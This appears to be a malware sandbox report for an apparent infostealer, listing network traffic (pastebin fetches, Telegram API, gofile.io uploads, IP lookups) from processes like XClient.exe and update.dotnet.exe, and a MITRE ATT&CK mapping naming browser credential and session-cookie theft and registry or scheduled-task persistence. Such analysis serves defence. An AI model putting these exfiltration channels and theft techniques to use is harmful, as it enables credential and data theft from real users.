HTTP Request

GET https://pastebin.com/raw/RPPi3ByL

HTTP Response

403
104.20.3.235:443

https://pastebin.com/raw/RPPi3ByL

tls, http

msedge.exe

950 B
9.8kB
10
13

HTTP Request

GET https://pastebin.com/raw/RPPi3ByL

HTTP Response

403
104.20.3.235:443

https://pastebin.com/raw/RPPi3ByL

tls, http

XClient.exe

996 B
9.8kB
11
15

HTTP Request

GET https://pastebin.com/raw/RPPi3ByL

HTTP Response

403
104.20.3.235:443

https://pastebin.com/raw/RPPi3ByL

tls, http

OneDrive.exe

950 B
9.7kB
10
13

HTTP Request

GET https://pastebin.com/raw/RPPi3ByL

HTTP Response

403
104.20.3.235:443

https://pastebin.com/raw/RPPi3ByL

tls, http

msedge.exe

1.1kB
10.0kB
14
19

HTTP Request

GET https://pastebin.com/raw/RPPi3ByL

HTTP Response

403
104.20.3.235:443

https://pastebin.com/raw/RPPi3ByL

tls, http

XClient.exe

996 B
9.8kB
11
15

HTTP Request

GET https://pastebin.com/raw/RPPi3ByL

HTTP Response

403
104.20.3.235:443

https://pastebin.com/raw/RPPi3ByL

tls, http

OneDrive.exe

950 B
9.8kB
10
13

HTTP Request

GET https://pastebin.com/raw/RPPi3ByL

HTTP Response

403
104.20.3.235:443

https://pastebin.com/raw/RPPi3ByL

tls, http

msedge.exe

950 B
9.7kB
10
13

HTTP Request

GET https://pastebin.com/raw/RPPi3ByL

HTTP Response

403

8.8.8.8:53

github.com

dns

chrome.exe

56 B
72 B
1
1

DNS Request

github.com

DNS Response

20.26.156.215
8.8.8.8:53

objects.githubusercontent.com

dns

chrome.exe

75 B
139 B
1
1

DNS Request

objects.githubusercontent.com

DNS Response

185.199.111.133

185.199.109.133

185.199.110.133

185.199.108.133
8.8.8.8:53

28.118.140.52.in-addr.arpa

dns

72 B
158 B
1
1

DNS Request

28.118.140.52.in-addr.arpa
8.8.8.8:53

234.187.250.142.in-addr.arpa

dns

74 B
113 B
1
1

DNS Request

234.187.250.142.in-addr.arpa
8.8.8.8:53

215.156.26.20.in-addr.arpa

dns

72 B
158 B
1
1

DNS Request

215.156.26.20.in-addr.arpa
8.8.8.8:53

133.111.199.185.in-addr.arpa

dns

74 B
118 B
1
1

DNS Request

133.111.199.185.in-addr.arpa
8.8.8.8:53

134.32.126.40.in-addr.arpa

dns

72 B
158 B
1
1

DNS Request

134.32.126.40.in-addr.arpa
224.0.0.251:5353

chrome.exe

340 B
5
8.8.8.8:53

95.221.229.192.in-addr.arpa

dns

73 B
144 B
1
1

DNS Request

95.221.229.192.in-addr.arpa
8.8.8.8:53

95.146.21.2.in-addr.arpa

dns

70 B
133 B
1
1

DNS Request

95.146.21.2.in-addr.arpa
8.8.8.8:53

209.205.72.20.in-addr.arpa

dns

72 B
158 B
1
1

DNS Request

209.205.72.20.in-addr.arpa
8.8.8.8:53

checkappexec.microsoft.com

dns

72 B
191 B
1
1

DNS Request

checkappexec.microsoft.com

DNS Response

51.140.244.186
8.8.8.8:53

186.244.140.51.in-addr.arpa

dns

73 B
147 B
1
1

DNS Request

186.244.140.51.in-addr.arpa
8.8.8.8:53

203.197.79.204.in-addr.arpa

dns

73 B
106 B
1
1

DNS Request

203.197.79.204.in-addr.arpa
8.8.8.8:53

fd.api.iris.microsoft.com

dns

71 B
198 B
1
1

DNS Request

fd.api.iris.microsoft.com

DNS Response

20.31.169.57
8.8.8.8:53

57.169.31.20.in-addr.arpa

dns

71 B
157 B
1
1

DNS Request

57.169.31.20.in-addr.arpa
8.8.8.8:53

212.20.149.52.in-addr.arpa

dns

72 B
146 B
1
1

DNS Request

212.20.149.52.in-addr.arpa
8.8.8.8:53

171.39.242.20.in-addr.arpa

dns

72 B
158 B
1
1

DNS Request

171.39.242.20.in-addr.arpa
8.8.8.8:53

raw.githubusercontent.com

dns

update.dotnet.exe

71 B
135 B
1
1

DNS Request

raw.githubusercontent.com

DNS Response

185.199.109.133

185.199.111.133

185.199.108.133

185.199.110.133
8.8.8.8:53

pastebin.com

dns

msedge.exe

58 B
106 B
1
1

DNS Request

pastebin.com

DNS Response

104.20.3.235

104.20.4.235

172.67.19.24
8.8.8.8:53

133.109.199.185.in-addr.arpa

dns

74 B
118 B
1
1

DNS Request

133.109.199.185.in-addr.arpa
8.8.8.8:53

235.3.20.104.in-addr.arpa

dns

71 B
133 B
1
1

DNS Request

235.3.20.104.in-addr.arpa
8.8.8.8:53

api.telegram.org

dns

update.dotnet.exe

62 B
78 B
1
1

DNS Request

api.telegram.org

DNS Response

149.154.167.220
8.8.8.8:53

220.167.154.149.in-addr.arpa

dns

74 B
167 B
1
1

DNS Request

220.167.154.149.in-addr.arpa
8.8.8.8:53

www.google.com

dns

chrome.exe

60 B
76 B
1
1

DNS Request

www.google.com

DNS Response

142.250.187.196
8.8.8.8:53

3.178.250.142.in-addr.arpa

dns

72 B
110 B
1
1

DNS Request

3.178.250.142.in-addr.arpa
142.250.187.196:443

www.google.com

https

chrome.exe

1.8kB
7.1kB
8
8
8.8.8.8:53

icanhazip.com

dns

update.dotnet.exe

59 B
91 B
1
1

DNS Request

icanhazip.com

DNS Response

104.16.184.241

104.16.185.241
8.8.8.8:53

196.187.250.142.in-addr.arpa

dns

74 B
112 B
1
1

DNS Request

196.187.250.142.in-addr.arpa
8.8.8.8:53

241.184.16.104.in-addr.arpa

dns

73 B
135 B
1
1

DNS Request

241.184.16.104.in-addr.arpa
8.8.8.8:53

clients2.google.com

dns

chrome.exe

65 B
105 B
1
1

DNS Request

clients2.google.com

DNS Response

142.250.187.238
8.8.8.8:53

clients2.googleusercontent.com

dns

chrome.exe

76 B
121 B
1
1

DNS Request

clients2.googleusercontent.com

DNS Response

142.250.200.33
8.8.8.8:53

238.187.250.142.in-addr.arpa

dns

74 B
113 B
1
1

DNS Request

238.187.250.142.in-addr.arpa
8.8.8.8:53

33.200.250.142.in-addr.arpa

dns

73 B
111 B
1
1

DNS Request

33.200.250.142.in-addr.arpa
8.8.8.8:53

74.19.199.152.in-addr.arpa

dns

72 B
143 B
1
1

DNS Request

74.19.199.152.in-addr.arpa
8.8.8.8:53

evcs-ocsp.ws.symantec.com

dns

142 B
428 B
2
2

DNS Request

evcs-ocsp.ws.symantec.com

DNS Request

evcs-ocsp.ws.symantec.com

DNS Response

152.199.19.74

DNS Response

152.199.19.74
8.8.8.8:53

evcs-crl.ws.symantec.com

dns

140 B
430 B
2
2

DNS Request

evcs-crl.ws.symantec.com

DNS Request

evcs-crl.ws.symantec.com

DNS Response

152.199.19.74

DNS Response

152.199.19.74
8.8.8.8:53

api.gofile.io

dns

update.dotnet.exe

118 B
182 B
2
2

DNS Request

api.gofile.io

DNS Request

api.gofile.io

DNS Response

51.91.7.6

45.112.123.126

DNS Response

45.112.123.126

51.91.7.6
8.8.8.8:53

store7.gofile.io

dns

update.dotnet.exe

124 B
156 B
2
2

DNS Request

store7.gofile.io

DNS Request

store7.gofile.io

DNS Response

31.14.70.250

DNS Response

31.14.70.250
8.8.8.8:53

6.7.91.51.in-addr.arpa

dns

68 B
105 B
1
1

DNS Request

6.7.91.51.in-addr.arpa
8.8.8.8:53

250.70.14.31.in-addr.arpa

dns

142 B
244 B
2
2

DNS Request

250.70.14.31.in-addr.arpa

DNS Request

250.70.14.31.in-addr.arpa
8.8.8.8:53

szurubooru.zulipchat.com

dns

update.dotnet.exe

140 B
332 B
2
2

DNS Request

szurubooru.zulipchat.com

DNS Request

szurubooru.zulipchat.com

DNS Response

3.81.156.163

50.17.0.11

35.153.41.95

52.20.41.38

54.198.104.147

44.208.10.127

DNS Response

52.20.41.38

50.17.0.11

35.153.41.95

54.198.104.147

44.208.10.127

3.81.156.163
8.8.8.8:53

163.156.81.3.in-addr.arpa

dns

142 B
250 B
2
2

DNS Request

163.156.81.3.in-addr.arpa

DNS Request

163.156.81.3.in-addr.arpa
8.8.8.8:53

172.214.232.199.in-addr.arpa

dns

74 B
128 B
1
1

DNS Request

172.214.232.199.in-addr.arpa
8.8.8.8:53

43.229.111.52.in-addr.arpa

dns

72 B
158 B
1
1

DNS Request

43.229.111.52.in-addr.arpa

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Scheduled Task

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Modify Authentication Process

Scheduled Task/Job

T1053

Scheduled Task

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Scheduled Task/Job

T1053

Scheduled Task

Defense Evasion

Modify Authentication Process

Modify Registry

T1112

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Modify Authentication Process

Steal Web Session Cookie

T1539

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Browser Information Discovery

T1217

Query Registry

System Information Discovery